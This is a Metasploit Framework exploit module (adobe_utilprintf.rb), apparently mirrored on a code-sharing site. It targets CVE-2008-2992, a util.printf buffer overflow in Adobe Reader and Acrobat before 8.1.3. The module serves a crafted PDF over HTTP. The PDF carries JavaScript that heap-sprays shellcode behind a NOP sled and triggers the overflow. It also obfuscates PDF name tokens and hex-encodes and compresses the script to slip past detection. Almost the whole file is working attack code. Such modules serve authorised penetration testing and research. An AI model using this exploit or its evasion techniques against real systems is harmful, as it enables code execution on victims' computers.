Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/adobe_utilprintf.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'zlib'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GoodRanking

10


11
  include Msf::Exploit::Remote::HttpServer::HTML

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Adobe util.printf() Buffer Overflow',

18
        'Description' => %q{

19
          This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional

20
          < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()

21
          entry, an attacker may be able to execute arbitrary code.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>' ],

25
        'References' => [

26
          [ 'CVE', '2008-2992' ],

27
          [ 'OSVDB', '49520' ],

28
        ],

29
        'DefaultOptions' => {

30
          'EXITFUNC' => 'process',

31
        },

32
        'Payload' => {

33
          'Space' => 1024,

34
          'BadChars' => "\x00",

35
        },

36
        'Platform' => 'win',

37
        'Targets' => [

38
          [ 'Adobe Reader v8.1.2 (Windows XP SP3 English)', { 'Ret' => '' } ],

39
        ],

40
        'DisclosureDate' => '2008-02-08',

41
        'DefaultTarget' => 0,

42
        'Notes' => {

43
          'Reliability' => UNKNOWN_RELIABILITY,

44
          'Stability' => UNKNOWN_STABILITY,

45
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

46
        }

47
      )

48
    )

49
  end

50


51
  def autofilter

52
    false

53
  end

54


55
  def check_dependencies

56
    use_zlib

57
  end

58


59
  def on_request_uri(cli, request)

60
    return if ((p = regenerate_payload(cli)) == nil)

61


62
    # Encode the shellcode.

63
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

64


65
    # Make some nops

66
    nops = Rex::Text.to_unescape(make_nops(4))

67


68
    # Randomize variables

69
    rand1 = rand_text_alpha(rand(100) + 1)

70
    rand2 = rand_text_alpha(rand(100) + 1)

71
    rand3 = rand_text_alpha(rand(100) + 1)

72
    rand4 = rand_text_alpha(rand(100) + 1)

73
    rand5 = rand_text_alpha(rand(100) + 1)

74
    rand6 = rand_text_alpha(rand(100) + 1)

75
    rand7 = rand_text_alpha(rand(100) + 1)

76
    rand8 = rand_text_alpha(rand(100) + 1)

77
    rand9 = rand_text_alpha(rand(100) + 1)

78
    rand10 = rand_text_alpha(rand(100) + 1)

79
    rand11 = rand_text_alpha(rand(100) + 1)

80
    randnop = rand_text_alpha(rand(100) + 1)

81


82
    script = %Q|

83
    var #{rand1} = unescape("#{shellcode}");

84
    var #{randnop} = "#{nops}";

85
    var #{rand2} ="";

86
    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(#{randnop});

87
    #{rand4} = #{rand2} + #{rand1};

88
    #{rand5} = unescape("#{randnop}");

89
    #{rand6} = 20;

90
    #{rand7} = #{rand6}+#{rand4}.length

91
    while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

92
    #{rand8} = #{rand5}.substring(0, #{rand7});

93
    #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});

94
    while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};

95
    #{rand10} = new Array();

96
    for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};

97
    util.printf("%45000.45000f", 0);

98
          |

99


100
    # Create the pdf

101
    pdf = make_pdf(script)

102


103
    print_status("Sending #{self.name}")

104


105
    send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })

106


107
    handler(cli)

108
  end

109


110
  def random_non_ascii_string(count)

111
    result = ""

112
    count.times do

113
      result << (rand(128) + 128).chr

114
    end

115
    result

116
  end

117


118
  def io_def(id)

119
    "%d 0 obj" % id

120
  end

121


122
  def io_ref(id)

123
    "%d 0 R" % id

124
  end

125


126
  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

127
  def n_obfu(str)

128
    result = ""

129
    str.scan(/./u) do |c|

130
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'

131
        result << "#%x" % c.unpack("C*")[0]

132
      else

133
        result << c

134
      end

135
    end

136
    result

137
  end

138


139
  def ascii_hex_whitespace_encode(str)

140
    result = ""

141
    whitespace = ""

142
    str.each_byte do |b|

143
      result << whitespace << "%02x" % b

144
      whitespace = " " * (rand(3) + 1)

145
    end

146
    result << ">"

147
  end

148


149
  def make_pdf(js)

150
    xref = []

151
    eol = "\x0d\x0a"

152
    endobj = "endobj" << eol

153


154
    pdf = "%PDF-1.5" << eol

155
    pdf << "%" << random_non_ascii_string(4) << eol

156
    xref << pdf.length

157
    pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj

158
    xref << pdf.length

159
    pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj

160
    xref << pdf.length

161
    pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj

162
    xref << pdf.length

163
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj

164
    xref << pdf.length

165
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj

166
    xref << pdf.length

167
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))

168
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol

169
    pdf << "stream" << eol

170
    pdf << compressed << eol

171
    pdf << "endstream" << eol

172
    pdf << endobj

173
    xrefPosition = pdf.length

174
    pdf << "xref" << eol

175
    pdf << "0 %d" % (xref.length + 1) << eol

176
    pdf << "0000000000 65535 f" << eol

177
    xref.each do |index|

178
      pdf << "%010d 00000 n" % index << eol

179
    end

180
    pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

181
    pdf << "startxref" << eol

182
    pdf << xrefPosition.to_s() << eol

183
    pdf << "%%EOF" << eol

184
  end

185
end

186


187